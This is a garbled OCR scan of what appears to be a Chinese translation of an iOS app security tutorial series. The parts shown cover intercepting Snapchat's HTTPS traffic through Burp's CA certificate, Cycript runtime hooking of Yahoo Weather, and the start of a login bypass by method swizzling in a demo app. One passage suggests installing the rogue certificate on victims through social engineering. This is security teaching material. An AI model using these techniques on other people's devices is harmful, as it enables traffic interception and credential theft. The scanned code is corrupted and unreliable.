hh Legitimate banks, stores, and other public sites will not ask you to do this. 


Location: 





| Certificate Status 


This site attempts to identify itself with invalid information. 


| View... | 


Unknown Identity 


Certificate is not trusted, because it hasn't been verified by a recognized authority 
using a secure signature. 


图 Permanently store this exception 


| Confirm Security Exception | | Cancel | 


s 


点 击 Details 标 签 ， 然 后 选择 证 书 层 次 最 上 面 的 证 书 。 这 就 是 根 证 书 。 然 后 点 击 导 出 并 保存 后 
级 名 为 .crt 的 文件 。 
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Certificate Hierarchy 


| PortSwigger CA 


www. facebook.com 


Certificate Fields 


F PortSwigger CA 
Y Certificate 
Version 
Serial Number 
Certificate Signature Algorithm 
Issuer 
¥ Validity 
Not Before 
Not After 
Field Value 





你 也 可 以 到 Burp 的 文档 找到 这 些 步骤 。 下 面 就 是 [这 个 链接 ] 的 屏幕 截图 。 


IPhone 


To install Burp's CA certificate on your iPhone or other IOS device, perform the following 
steps. 


1. First, you need to use your desktop browser to export Burp's CA certificate. This is 
easy with both Internet Explorer and Firefox. Follow the steps to install the CA 
certificate in your desktop browser, and then visit any HTTPS URL. Click on the 
padlock / SSL icon to view the details of the SSL certificate. Then select the root 
certificate in the tree (PortSwigger CA), and in the details for that certificate click the 
"Export" button. Save the certificate somewhere on your computer using the .crt file 
extension. 

2. Copy the certificate onto your iPhone. The easiest way to do this is to send it as an 
email attachment from your desktop computer to an account that your iPhone is set 
up to receive emails for. 

3. On your iPhone, open the email and click on the attachment. 

4. In the dialog that opens, click the "Install" button, and step through the certificate 
installation wizard, entering your PIN number if requested. 


Note that you may be able to download Burp's CA certificate directly to your device by 
visiting http://burp/cert with your device configured to use Burp as its proxy. 
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现在 你 就 可 以 把 这 个 文件 发 送 到 你 的 设备 上 。 使 用 恰当 的 社会 工程 学 技巧 ， 攻 击 者 就 能 够 把 
这 个 证 书 安 装 到 设备 上 ， 用 户 不 会 知道 会 有 什么 后 果 。 下 面 就 是 你 打开 这 个 证 书 的 时 候 会 得 
到 的 警告 。 


Received 23-Jul-2013 
Contains Certificate 


More Details 





点 击 安装 。 你 可 以 看 到 更 详细 的 萱 告 信息 。 
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The authenticity of "PortSwigger 
CA" cannot be verified. Installing this 
profile will change settings on your 







































































Installing the certificate 
"PortSwigger CA" will add it to the 
list of trusted certificates on your 
iPod. 











Received 23-Jul-2013 
Contains Certificate 


More Details 
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现在 ， 既 然 这 个 根 证 书 被 认为 是 合法 的 ， 每 个 被 这 个 根 证 书签 名 的 证 书 都 会 被 视 为 合法 的 ， 
应 用 就 会 允许 数据 被 传输 。 现 在 ， 之 前 不 让 我 们 用 假 的 SSL 人 证 书 传递 数据 的 Snapchat 应 用 允 
许 我 们 成 功 的 把 数据 传输 出 去 。 这 个 网 络 流量 会 被 Burpsuite 拦 截 。 如 下 图 所 见 ， 在 登录 调用 
的 时 候 ， 我 们 可 以 看 到 用 户 名 和 密码 和 其 他 一 些 这 个 应 用 正在 调用 的 API 请 求 。 


eoo — = | Burp Suite Free Edition v1.5 


Burp intruder cuam Window Help 


一 一 一 一 一 History | Options 
| Filter: Hiding CSS, image and general binary content 








€ a) Host | Method | URL | Params | Modified | Status | Length | MIMEtype | Extension | Title | c 
54 http://data.flurry.com POST /aas.do (7) GJ 200 149 do 

56 https://feelinsonice-hrd.ap... POST /bg/upload (7) Q 200 255 

57 https://feelinsonice-hrd.ap... POST /bq/bests 四 加 200 349 JSON 

58 https://feelinsonice-hrd.ap... POST /bq/logout 四 GJ 200 255 





| < 
Request 
[Raw J Params | Headers | Hex | 


POST request to /bq/login 





Type | Name | Value 
Body req token 9303d356fdflbba86ef968eef4af978437e64d8619a89a84c9b40b14d6c5]1 





Body timestamp 1374599470583 
Body version 5.0.1 





本 文 我 们 学 习 了 查看 通过 iOS 设 备 的 网 络 流量 的 不 同方 法 。 能 够 知道 我 们 调用 的 对 方 是 哪里 ， 
有 哪些 请 求 和 响应 ， 请 求 的 头 和 参数 是 什么 等 等 会 帮助 我 们 了 解 应 用 内 部 是 如 何 工作 的 。 


本 文 原文 是 IOS Application Security Part 11 — Analyzing Network Traffic over HTTP/HTTPS 
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用 Cycript 进 行 实时 修改 


本 文 ， 我 们 将 使 用 Yahoo Weather 应 用 来 执行 所 有 的 测试 。 它 有 一 个 清爽 和 优雅 的 U 来 提供 不 
同 地 区 的 天 气 信 息 。 


— € Yahoo Weather 应 用 被 安装 好 ， 请 确保 它 运 行 在 前 人 台 。 这 是 因为 如 果 应 用 在 后 台 ， 和 那 它 就 
会 被 暂停 ， 你 也 不 能 对 它 做 哈 。 一 旦 应 用 跑 起 来 ， 你 可 以 先 找到 其 进程 Iq， 然后 用 cycript -p4 
钧 其 进程 。 





如 果 挂 钧 成 功 ， 你 可 以 得 到 一 个 Cycript 解 释 器 。 你 可 以 通过 Objective-C 的 语法 [UIApplication 
sharedApplication]. 来 得 到 实例 。 





如 下 图 所 示 ， 你 也 可 以 通过 Cycript 解 释 器 定义 变量 。 在 这 里 ， 我 定义 了 一 个 变量 a 来 代表 
[UlApplication sharedApplication]。 请 注意 ， 命 令 的 L.H.S(Right Hande Side) 是 Javascript > 
而 R.H.S(Right Hand Side) 是 Objective-C 语 法 。 这 就 是 Cycript 美 的 地 方 。 





Cycript 软 认 就 有 这 个 变量 ， 用 它 可 以 很 容易 的 得 到 应 用 的 实例 。 





为 了 找到 这 个 应 用 的 delegate， 我 们 可 以 用 [UlApplication sharedApplication].delegate. 不 过 
既然 我 们 已 经 定义 了 一 个 a 代表 应 用 的 实例 ， 我 们 可 以 用 下 图 的 方式 来 得 到 delegate 。 





iC) dr “= WNIK 


KE > RILE 4n i8 3x ^ delegate Žž 85,2 4r x YWAppDelegate » A JCdelegate X fF 3i Æ 
YWAppDelegate.h 和 YWAppDelegate.m。 让 我 们 在 它 运行 的 时 候 试 着 让 它 调用 几 个 方法 。 
这 个 应 用 给 出 如 下 的 图 片 。 
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ce CORNEA: :我 们 可 以 调用 方法 让 状态 栏 显示 。 
4 ， 请 确保 我 们 在 进行 运行 时 分 析 这 个 应 用 的 时 候 ， 这 个 应 用 运行 在 前 台 。 
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这 是 这 个 应 用 现在 的 样子 。 


iPod 会 1:29 AM (ou 
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正如 你 看 到 的 ， 现 在 状态 栏 是 可 见 的 了 。 让 我 们 看 看 我 们 能 否 修 改 这 个 应 用 的 提醒 数字 。 提 
醒 数 字 是 在 应 用 程序 右上 角 显 示 的 数字 。 通 第 它 是 指 一 个 应 用 收 到 的 push 通 知 数目 。 在 邮件 
应 用 中 ， 它 也 可 以 指 未 读 邮 件 的 数量 。 在 Yahoo Weather 这 个 应 用 中 ， 这 里 没有 push 通 知 的 
概念 ， 因 此 ， 这 里 没有 在 应 用 程序 图 标的 右上 角 显 示 数 字 。 这 个 提醒 数字 在 本 地 可 以 很 方便 
的 设置 。 让 我 们 试 试 给 它 设置 提醒 数字 为 999。 





现在 我 们 按 Home 键 ， 可 以 在 应 用 的 果 面 图 标 上 看 到 提醒 数字 。 


YAHOO! 
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现在 我 们 看 看 还 能 找 出 些 什么 有 趣 的 东西 。 为 了 找 出 当前 的 view controller 4&1 4 AFBI 
出 keyWindow。 keyWindow 有 是 一 个 用 来 接受 用 户 交 互 〈 例 如 点 击 事件 ) 的 window。 如 果 你 想 
要 找 出 应 用 所 有 的 window， 可 以 执行 下 面 的 命令 。 





为 了 找 出 在 特定 时 刻 的 keyWindow。 可 以 这 么 做 。 





root view controller 可 以 用 如 下 的 方法 找 出 来 。 





如 你 所 见 ，rootViewController 的 名 字 是 YahooSlidingController。 从 它 的 名 字 可 以 推断 ， 它 是 
如 下 图 的 slider 所 使 用 的 类 
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Finance 
ME 
Messenger 
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Yahoo! 
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© Settings 
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= 218108 (512101072 (01; 
因此 ， 这 个 类 基本 上 是 其 他 所 有 的 view controller —4- 7h (facade) 类 。 这 意味 着 当 某 个 
菜单 被 选 的 时 候 ，YahooSlidingController 负 责 调用 对 应 的 view controller 来 显示 。 
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本 文 我 们 介绍 了 如 何在 越狱 设备 上 安装 Cycript， 如 何 挂 钧 运行 的 进程 和 找 出 应 用 的 属性 信 
息 。 我 们 也 展示 了 如 何在 应 用 程序 的 沙 盒 内 (由 我 们 自己 ) 调用 我 们 自己 的 函数 。 在 下 一 篇 
草 ， 我 们 将 找 出 特定 类 的 所 有 方法 并 修改 其 实现 。 我 们 也 会 看 看 如 何 去 修 改 特 定 类 的 实例 


Oo 


pu 
又 


D 


References: 

Cycript 

http://www.cycript.org/ 

Cycript tricks 
http://iphonedevwiki.net/index.php/Cycript_ Tricks 


本 文 原文 是 iOS 应 用 程序 安全 (4)- 用 Cycript 进 行 运行 时 分 析 (Yahoo 天 气 应 用 ) 
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在 前 一 篇 文 草 中 ， 我 们 学 习 了 如 何在 设备 上 安装 使 用 Cycript。 本 文 我 们 将 使 用 一 些 运行 时 分 
析 的 高 级 技巧 。 我 们 将 看 看 如 何 获 得 特定 类 (方法 ， 实 例 变 量 ) 的 值 并 且 在 运行 时 修改 它 
们 。 


找 出 特定 类 的 方法 


现在 假定 我 们 正在 一 个 程序 运行 的 时 候 分 析 它 的 流程 ， 那 么 ， 知 道 特定 类 或 者 特定 view 
controller 正 在 调用 哪些 方法 将 会 给 我 们 极 大 的 帮助 。 因 为 Cycript 能 in 混合 使 用 Objective-C 和 
oi > 我 们 能 够 写 一 个 即 有 Objective-C 又 有 Javascript 语 法 的 函数 。 我 们 那个 能 够 在 解 

器 中 定义 函数 ， 然 后 在 任意 时 候 使 用 它们 以 帮助 我 们 找到 有 用 信息 。 ye 这 些 有 
代码 块 的 地 方位 于 这 里 。 本 文 我 们 将 使 用 这 文 里 的 代码 块 。 


首先 ， 确 保 我 们 挂钩 进 了 正在 运行 的 进程 。 


Prateeks-i1Pod:~ root# ps aux 

mobile al lä © ð ls 383184 33932 E Us 2: 1/7AH 0:08.86 /var/mobile/Applications/ EA 
aqgBgFEE-8178-489851-87805-3A3CC2C52A6F/658 379 weather.app/weather 

root T Ale 68, À 2739332 B sgg R+ 2: 194M 0:00, 00 grep weather 
DE rogt& cycript -p 1718 


c Y Era 





我 们 先 定义 一 个 能 够 打印 出 一 个 指定 类 的 方法 的 函数 。 你 可 以 在 这 找到 这 些 Cycript tricks ° 


y# function printMe ethods (className 
C var count = new new Type 
var methods = class copvMethadListiíob]c getClasst(className count 
var smethodsArray = 
for¢var 1 = ee cere le 
war method = methads[1 
methodsArray.push(€{selector:method getName (method implementation:method getImplementatia 


nftmethod 


freefmethods 
free fcount 
return methodsArray 





既然 我 们 已 经 定义 好 了 方法 ， 那 么 我 们 可 以 输入 任何 类 ， 然 后 得 到 对 应 的 方法 列表 。 从 上 一 
片 文章 中 ， 我 们 知道 Yahoo Weather 的 delegate 是 YWAppDelegate. 因此 ， 这 里 试 试 这 个 类 包 
钨 的 所 有 方法 。 
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类 似 的 ， 我 们 可 以 打印 出 YahooSlidingViewController 的 方 
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管理 着 slide 菜 单 ， 并 且 充 当 着 外 观 者 (facade) 的 作 
的 view controller， 我 们 可 以 使 用 下 面 的 命令 


.topViewController 
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的 View controllers 因此， 下 面 的 view 实 
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让 我 们 打印 出 YWMainViewController 的 方法 。 








你 可 以 看 到 ， 这 里 有 个 方法 叫做 userDidrequestUpdate. 


EE 
从 方法 名 称 可 以 看 出 ， 一 旦 用 户 下 拉 刷 新 ， 这 个 方法 就 会 被 调用 。 有 Cycript， 我 们 可 以 随时 
调用 这 个 方法 。 我 们 要 先 引 用 这 个 view controller ， 然 后 在 其 上 调用 这 个 方法 。 如 下 图 所 示 。 
oo | 
可 以 看 到 ， 即 使 我 们 并 没有 下 拉 刷 新 ， 应 用 也 完成 了 更 新 。 
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如 上 面 所 说 ， 这 些 方法 也 包含 属性 的 setter 和 getter ^ 





从 安全 的 角度 来 说 ， 能 够 在 运行 时 操纵 应 用 程序 给 了 我 们 巨大 的 优势 。 我 们 能 够 在 我 们 想 要 
的 时 候 调 用 任何 方法 。 想 像 一 下 当 用 户 第 一 次 登陆 的 时 候 输 入 其 用 户 名 和 密码 ， 一 旦 登陆 成 
功 ， 一 个 叫做 didLogin 的 方法 会 被 调用 。 我 们 可 以 直接 调用 这 个 方法 而 不 用 输入 任何 用 户 名 / 
密码 的 组 合 。 


如 果 我 们 能 够 把 特定 view controller 的 变量 都 打印 出 来 的 话 ， 那 会 很 有 用 处 的 。 因 此 ， 我 们 定 
义 一 个 能 够 打印 出 所 有 实例 变量 的 苑 数 ， 你 可 以 从 这 找到 代码 块 。 





现在 ， 我 们 打印 出 YWMainViewController 的 实例 变量 。 





你 可 以 看 到 ， 这 里 有 一 个 location view controller 的 实例 变量 ， 你 可 以 向 左 和 向 右 Swipe 滑 动 来 
查看 不 同 的 地 方 。 从 名 字 来 看 ，|locationViewControllers 更 像 是 一 个 viewcontroller 数 组 。 使 用 
Cycript， 我 们 能 够 打印 出 该 变量 的 值 。 





现在 我 们 向 右 滑 到 New York 
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现在 我 们 打印 出 这 个 变量 








可 以 看 到 ， 这 个 数组 始终 包含 3 个 location view， 其 他 的 都 是 nil。 它 并 不 把 所 有 的 location 

view i 包含 进来 ， 以 便 更 好 的 管理 内 存 。 所 以 在 任何 时 刻 ， 我 们 能 够 拥有 当前 正在 

看 的 ， 左 边 和 右边 的 view controller。 当 我 们 想 要 去 男 一 个 不 同 地 方 的 时 候 ， 它 会 上 自动 的 使 得 

5 NM 见 的 位 于 中 间 并 且 实 例 化 其 左边 和 右边 的 view controller， 因 此 当 我 们 滑动 的 时 候 ， 不 
觉 到 任何 的 时 延 。 这 是 个 编写 不 占用 过 多 内 存 的 代码 的 好 方法 。 


E 


ÈK 


WR 


在 前 两 篇 文章 中 ， 我 们 对 Yahoo weather 应 用 进行 了 运行 时 分 析 。 在 接 下 来 的 文章 中 ， 我 们 将 
看 到 更 多 Cycript 的 技术 ， 并 且 我 们 将 关注 method swizzling ° 


References: 
Cycript 
http://www.cycript.org/ 
Cycript tricks 


http://iphonedevwiki.net/index.php/Cycript_ Tricks 


本 文 原文 是 iOS 应 用 程序 安全 (5)- 用 Cycript 做 运行 时 分 析 的 高 级 技巧 (Yahoo 天 气 应 用 ) 


#6 iOS 应 用 动态 分 析 下 的 更 多 文章 


2| & 
本 文 我 们 将 在 一 个 例子 程序 上 看 如 何 用 Cycript 做 method Swizzling 。 


第 一 件 事情 就 是 下 载 Xcode 例 子 工 程 。 你 可 以 从 这 下 载 。 或 者 你 也 可 以 从 这 下 载 二 进 制 文 件 。 
推荐 你 下 载 Xcode 例 子 工 程 ， 看 看 源 代 码 。 


请 确保 使 用 你 自己 的 证 书 来 签名 。 























m | 4 | 国 SelfsignedApp 
PROJECT Info | Build Settings | 
: | : 一 — - = - rideau 二 s L 
v C SelfSignedApp = Basic P | Combined ‘ ar 
hj AppDelegate.h TARGETS Setting s P5 Resolved B SelfsignedApp 1, iOS Default 
ete AÀ SelfsignedApp Y Code Signing - ———————— 
a maneo HERE SelfSignedAppTests Code Signing Entitlements 
Im SDN TUI Y Code Signing Identity Prateekg $ Prateekg * 
b CJ Supporting Files Debug Prateekg + Prateekg + 
> 站 SelfSignedAppTests Any iOS SDK + Prateekg $ Prateekg + 
> (| Frameworks Release Prateekg + Prateekg + 
> | jProducts Any iOS SDK © Prateekg Prateekg 
Code Signing Resource Rules Path 
Other Code Signing Flags 
Deployment = | p 7 MEM 
Additional Strip Flags 
Alternate Install Group staff staff 
Alternate Install Owner prateekgianchandani prateekgianchandani 
Altarnata Inctall Darmicciane WwW nn-w arx HW nna-w arY 











一 旦 你 让 这 个 app 在 设备 上 运行 起 来 ，ssh 进 设备 ， 然 后 用 Cycript 挂 钓 这 个 进程 。 你 可 以 通过 
命令 cycript -p [app_id] 来 挂钩 进入 任意 进程 。 





Prateeks-MacBook-Pra:- prateekgianchandani$ ssh root@lð. 0.1.79 
rootag18.8.1.70's password: 
Prateeks-iPod:- root# ps aux | grep "Method" 


mobile 528 D.A 2.2 336648 5724 Tr 5s 5:88PM 8:88.41 /var/mobile/Applications/BFFB8lBBB-CECI-451B- 
A783-BD36152280E12/MethodSwizzlingDemo.app/MethodSwizzlingDemo 

roat 638 8.8 B.A 273932 a s888 R+ 5: BAPM 8:88.88 grep Method 

Prateeks-iPod:- root# cycript -p 628 

cyt i 


如 你 所 见 ， 这 个 app 有 一 个 登录 框 。 请 注意 在 本 文中 ， 我 们 只 会 在 点 击 Login Method 1 这 个 按 


这 
钮 的 时 候 绕 过 登录 。 
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Login To Continue 





用 户 名 和 密码 是 admin:password。 登 录 后 可 以 进入 管理 页 面 。 





Welcome, admin 


6.4 Fl] Cycript £T Method Swizzling 


186 
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如 果 输 入 的 用 户 名 和 密码 有 误 ， 那 会 得 到 一 个 错误 提示 。 


Error 


Incorrect Username or password 


solr fo [n] o]r 





我 们 的 目标 就 是 绕 过 这 个 登录 View © 


首先 ， 我 们 先 找 到 这 个 应 用 对 用 的 root view controller. 在 cycript 中 用 下 面 的 命 
UlApp.keyWindow.rootViewController 





@' '<UINavigat ionCont roller: üxlb8258-" 


既然 我 们 在 应 用 中 看 到 的 第 一 个 视图 就 是 这 个 登录 页 面 ， 我 们 可 以 确定 负责 显示 这 个 视图 的 
view controller 是 我 们 用 前 一 个 命令 找到 的 navigation controller 的 一 部 分 。 我 们 可 以 用 
navigation controller 的 visibleViewController 属 性 来 找到 当前 的 视图 。 


Cy rootVc = UIApp.keyWindaow.rootViewContraller 
@"<UINavigationController: 8Bx1b8550-2" 

cyt rootVe.visibleViewController 
@"<ViewController: BxlbB8cB5B8-" 


cyt B 


完美 。 现 在 让 我 们 写 个 函数 打印 出 该 view controller 的 所 有 方法 吧 。 这 个 方法 是 从 Cycript 技 巧 
页 面 拿 过 来 用 的 。 我 建议 你 仔细 看 看 这 个 页 面 ， 能 发 现 很 多 不 错 的 代码 。 


下 面 就 是 我 用 的 代码 。 
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function printMethods(className) { 

var count - new new Type("I"); 

var methods - class copyMethodList(objc getClass(className), count); 

var methodsArray - []; 

for(var i = 0; i < *count; i++) { 

var method - methods[i]; 

methodsArray.push({selector:method_getName(method), implementation:method getImplement 


co CON OOBRWNE 


free(methods); 

10. free(count); 

11. return methodsArray; 
12, 








4 


cy# function printMethods(className) { 

cy> var count = new new Type("I"); 

cy> var methods = class copyMethodList(objc getClass(classMame), count); 
cy> var methodsArray = []; 

cy> for(var i = 8; i = «count; i++) { 








Cy var method = methods[il; 
cy> methodsArray.push({selector:method_getName(method), implementation:method_getImplementation({method)}); 
cy>  ] 


cy> Tree(methods) ; 
Cy» — free(count); 
cy> return methodsArray; 


cy» B 


现在 让 我 们 打印 出 当前 view controller 的 所 有 方法 。 请 注意 这 个 函数 取 的 是 类 名 ， 在 这 里 是 
ViewController 


cyt printMethods(ViewController) 
[[selector:gselector(validatelLogin),implementation:Bx5aB3i5],[selector:gselectar(pushLoginPage),implementation:Bx5a75dl,[selectaor:gselectar 
(loginTapped:),implementation:B8x5ada8],[selector:gselector(loginZTapped:),implementation:B8Bx5ade8],[selectar:gselectar(setPasswardTextField 
:j,implementation:Bx5a7bd),[selector:gselectaor(setüsernameTextField:),implementation:8x5aB8B21],[selector:gselector(didReceiveMemoaryWarning) 
,implementation:Bx5a3Tl],[selector:gselector(viewDidLoad),implementation:8x5a371],[selector:gselector(passwordTextField),implementation:Bx 
ar MD C : : 2: 09 2:  :  : 2 20]. 0 0 0] 2: 2: 0 

cyt 





获取 方法 名 称 的 另 一 个 方法 就 是 使 用 isa.messages 属 性 。 根 据 革 果 的 官方 文档 ，isa 是 一 个 指 
向 类 结构 的 指针 。 


下 面 是 从 同一 页 摘 取 的 文字 。 


“ 当 一 个 新 对 象 创 建 的 时 候 ， 其 内 存 会 被 分 配 ， 实 例 变量 会 被 初始 化 。 MN 里 面 
Mil ddl ih 类 对 象 的 指针 。 这 个 指针 ， 叫 做 isa, 使 得 这 个 对 象 能 够 访问 它 
的 类 ， 通 过 这 个 类 ， 能 够 找到 所 以 它 继 承 目的 类 。” 


下 面 这 个 来 自 苹果 文档 的 图 解释 得 很 清晰 。 


Figure 3-1 Messaging Framework 


superclass 


The root class (NSObject) selector...address 
selector.. -address 
selector.. -address 






superclass 







selector...address 
selector...address 
selector...address 


The object's superclass 


superclass 


The object's class selector...address 
selector...address 
selector...address 





P 


instance variable 
instance variable 





所 以 ， 什 么 — ER? 首先 我 们 必须 要 知道 什么 是 分 发 表 〈dispatch table) » TR 


A Z 
表 包 含 了 很 多 条 目 ， 这 些 条 目 关联 方法 的 selector 和 方法 在 类 的 地 址 。 让 我 们 看 一 下 从 苹果 


E 
方 的 截图 。 


When a message is sent to an object, the messaging function follows the object's isa pointer to the class structure where it looks up the method selector in the dispatch table. If it 
can't find the selector there, objc_msgSend follows the pointer to the superclass and tries to find the selector in its dispatch table. Successive failures cause objc msgSend to climb 


the class hierarchy until it reaches the NSObject class. Once it locates the selector, the function calls the method entered in the table and passes it the receiving object s data 
structure. 


This is the way that method implementations are chosen at runtime—or, in the jargon of object-oriented programming, that methods are dynamically bound to messages 


iOS 安全 Wiki 


Me 
X 


“给 一 个 对 象 发 送 消 息 的 时 候 ， 消 息 函 数 会 根据 对 象 的 isa 指 针 到 类 结构 中 的 分 发 表 查 找 对 
方 的 方法 选择 器 (method selector) 。 如 果 没 有 找到 ， 那 objc msgSend 用 这 个 指针 找到 
oleae ' 然后 查找 Superclass 的 分 发 表 。 连 续 的 查找 失败 会 让 objc_ msgSend 一 直 
依次 查找 类 层次 直到 NSObject。 一 旦 它 定 位 到 选择 器 (selector) > objo msgSend 就 调 
yas 接收 的 对 象 数据 结构 传递 给 它 。 IE 
现 的 方法 。 或 者 用 面向 对 象 编程 的 术语 ， 这 些 方法 和 消息 是 动态 绑 定 的 。 


区 


现在 ， 很 容易 就 能 猜 到 messages 属 性 是 能 发 给 类 实例 或 者 类 本 身 的 方法 的 消息 列表 。 这 
将 是 一 个 非常 大 的 列表 ， 因 为 jsa 指 针 会 选择 从 它 父 类 一 直到 NSObject 的 消息 。 上面 有 一 
行 值得 特别 注意 。 “这 就 是 在 运 ae ee 的 方法 。 或 者 用 面向 对 象 编程 的 术语 ， 
这 些 方法 和 消息 是 动态 绑 定 的 。 


这 
为 为 方法 和 消息 是 在 运行 时 绑 定 的 ， 所 以 我 们 能 够 更 改 东 个 特定 消息 的 方法 实现 


在 这 里 ， 让 我 们 打印 出 App Delegate 类 的 所 有 消息 。 


(cy$hasImplicitProperties:0x4224170," installAppearanceSwizzleForSetter:":0x32022741,"cancelPreviousPerformRequestsWithTarget:":0x37b5dcbd,"cancelPreviousPerformRequestsWithTarget: 
selector:object:":0x37b4492d," implementsSelector:":0x37bd1815,initialize:0x37b479fd, load:0x37b61b99,version:0x37bd18f5,"setVersion:":0x37b75699," instancesImplementSelector:":0x37bd 
17a9,classForKeyedUnarchiver:0x37b55109,classFallbacksForKeyedArchiver:0x37b5d389," shouldAddObservationForwardersForKey:":0x37b8e915,"setKeys:triggerChangeNotificationsForDependen 
tKey:":0x37bc6655,"automaticallyNotifiesObserversForKey:" :0x37b77971,"keyPathsForValuesAffectingValueForKey:":0x37b4efcd," keysForValuesAffectingValueForKey:":0x37b4f0a5," createVa 
lueGetterWithContainerClassID:key:":0x37b5b701," createValueSetterWithContainerClassID:key:":0x37b69e2d," createValuePrimitiveGetterWithContainerClassID:key:":0x37b7b7b1," createVa 
luePrimitiveSetterWithContainerClassID:key:":0x37b78435," createMutableOrderedSetValueGetterWithContainerClassID:key:":0x37b79181," createMutableSetValueGetterWithContainerClassID: 
key:":0x37b798a9," createOtherValueGetterWithContainerClassID:key:":0x37b7b969," createO0therValueSetterWithContainerClassID:key:":0x37b785ed,accessInstanceVariablesDirectly:0x37b78 
3dd," createMutableArrayValueGetterWithContainerClassID:key:":0x37b78831,"CA automaticallyNotifiesObservers:":0x34007d5d,"CA encodePropertyConditionally:type:":0x33171809,"CA gette 
rForType:":0x34007d59,"CA setterForType:":0x34007d55,"CA CAMLPropertyForKey:":0x34007d61," isKeyExcludedFromWebScript:":0x36710035," isSelectorExcludedFromWebScript:":0x36710031, web 
kit invokeOnMainThread:0x3670bb41,new:0x321e3b45,"isSubclassOfClass:":0x32200c5d,"methodSignatureForSelector:":0x32229e35,mutableCopy:0x32288ee9, methodForSelector:":0x32200d89," in 
stanceMethodForSelector:":0x321f3a91," forwardInvocation:":0x32288bb9,"instanceMethodSignatureForSelector:":0x321e2665,finalize:0x32288e41,allowsWeakReference:0x32288c99, retainWeakR 
eference:0x32288c9d, tryRetain:0x32288c91, isDeallocating:0x32288c95,"instancesRespondToSelector:":0x32220641,"mutableCopyWithZone:":0x32288eed," forwardingTargetForSelector:":0x322 
BBc29,"isAncestor0fO0bject:":0x3228884d, isFault:0x3228887d,"resolveClassMethod:":0x321fdbf5,"resolveInstanceMethod:":0x321de5a1, copyDescription:0x32288c4d,"doesNotRecognizeSelector 
:" 180x32288881,"allocWithZone:":0x321d9b85,dealloc:0x32288d95, init:0x32288ce9, autorelease:0x32288cdd," copyWithZone:":0x32216cc5,release:0x321dd181,alloc:0x321ce271,"performSelector: 
withObject:with0bject:":0x32288a9d, copy:0x32288ee5, retain:0x321dcb15,debugDescription:0x32288c2d,description:0x3220b5c1,retainCount:0x32288cel,"respondsToSelector:":0x321fc165," con 
formsToProtocol:":0x32226195," isMember0fClass:":0x32288835," isKind0fClass:":0x32204d399, isProxy:0x3221471f15,"performSelector:withO0bject:":0x32213ec5,"performSelector:":0x32208fc1,20n 
e:0x32288ee1,self:0x321d78d1,class:0x321ce9dd,superclass:0x321e5ac5,hash:0x32216cc9," isEqual:":0x32216375," cy$toJSON: inContext:":0x422740c, cy$box:0x4224138,  cy$valueOfInContext:":0 
x422413c,"cy$deleteProperty:":0x4224164," cy$setProperty:to:":0x422415c, " cy$getPropertyNames:inContext:":0x422416c," " cy$getProperty:inContext:":0x4237bB80," cy$getProperty:":0x4224154, 
"cyS$hasProperty:":0x422414c,cy$JSType:0x4224144," cy$toCYON:":0x422742c,"  setSnoopiWatchDog:":0x255931,becomeActive:0x36b41c3d, becomeInactive:0x36b41c41,"postNotificationWithDescri 
ption:":0x36b2d4dd,okToNotifyFromThisThread:0x36b3be61,"fromNotifySafeThreadPerformSelector:withObject:":0x36b2d449,allowSafePerformSelector:0x36b27aa9,disallowSafePerformSelector: 
0x36b32fd9,"fromNotifySafeThreadPostNotificationName:object:userInfo:":0x36b2d2d5," fromMainThreadPostNotificationName:object:userInfo:":0x36b3be6d,selectionAffinity:0x31fa37c9, tex 
tSelectingContainer:0x31fa2e0d, unmarkText:0x31e01339," expandSelectionToStartOfWordsBeforeCaretSelection:":0x31fa0ab5," extendCurrentSelection:":0x31fa0Bfd, setCaretSelectionAtEnd 
OfSelection:0x31fa0c25," moveToEndOfWord:withHistory:":0x31falb85," moveToEndOfLine:withHistory:":0x31fale65," moveRight:withHistory:":0x31fa2b81," moveToStartOfWord:withHistory:": 
0x31fa1909," moveToStartOfLine:withHistory:":0x31falce9," moveleft:withHistory:":0x31fa2a8d," moveToEndOfParagraph:withHistory:":0x31fa2201," moveToEndOfDocument:withHistory:":0x31 
fa24c5," moveDown:withHistory:":0x31fa2831," moveToStartOfParagraph:withHistory:":0x31falfe9," moveToStartOfDocument:withHistory:":0x31fa2411," moveUp:withHistory:":0x31fa25d5, del 
eteByWord:0x31lfa0ca5, deleteToStartOfLine:0x31fa0d51, deleteToEndOfLine:0x31fa0eb9," setMarkedText:selectedRange:":0x31fa302d," rangeO0fEnclosingWord:":0x31d98c4d, fullText:0x31fa86 
39, setGestureRecognizers:0x31fa2e11," characterInRelationToRangedSelection:":0x31dca8035, characterBeforeCaretSelection:0x31dc9fad, selectionAtWordStart:0x31fa06a5, wordContainingC 
aretSelection:0x31fa0599," deleteBackwardAndNotify:":0x31fa1021," deleteForwardAndNotify:":0x31fa1049," characterInRelationToCaretSelection:":0x31dc9fc1, isEmptySelection:0x31fa082 
1," moveCurrentSelection:":0x31fa09c5," lastRectForRange:":0x31fa1221," replaceCurrentWordWithText:":0x31fallb1, rectContainingCaretSelection:0x31e51ab1, selectionAtDocumentStart:0 
x31fa0741, characterAfterCaretSelection:0x31dca269," clampedpositionFromPosition:offset:":0x31decldd," nsrangeForTextRange:":0x31e51981, selectionAtDocumentEnd:0x31fa0807b1," positio 
nFromPosition:inDirection:offset:withAffinityDownstream:":0x31fa2c79," scrollRectToVisible:animated:":0x31fa21319, selectionAffinity:0x31fa2d19, fontForCaretSelection:0x31e4ed69, te 
xtColorForCaretSelection:0x31fal3fd, newPhraseBoundaryGestureRecognizer:0x311a3155, selectableText:0x31d98cb9," indexForTextPosition:":0x31e51a11, keyInput:0x31fa0535," setSelected 
TextRange:withAffinityDownstream:":0x31fa2ca9," updateSelectionWithTextRange:withAffinityDownstream:":0x31fal4b5," setHistory:withExtending:withAnchor:withAffinityDownstream:":0x31 
fal735," setSelectionRangeWithHistory:":0x31fal4e5," phraseBoundaryGesture:":0x31fa3259, selectionAsNSRange:0x31fa0539, hasMarkedTextOrRangedSelection:0x31fa0895, expandSelectionTo 








直接 使 用 messages 属 性 也 一 样 可 以 。 


cyst 

(window:0x6330d,"applicationWillTerminate:":0x63301,"applicationDidBecomeActive:":0x632f5,"applicationWillResignActive:":0x632d1,"applicationDidEnterBackground:":0x632dd," applicati 
onWillEnterForeground:":0x632e9,"application:didFinishLaunchingWithOptions:":0x632b5,"setWindow:":0x63329,dealloc:0x63255,undoManager:0x31e9e60d , nextResponder:0x31cb14b5, firstRespo 
nder:0x3lcb0ad5,"canPerformAction:withSender:":0x31d89a15,resignFirstResponder:0x31cae615,"touchesCancelled:withEvent:":0x31dcafe9," handleKeyEvent:":0x31dc51e9,"motionEnded:withEv 
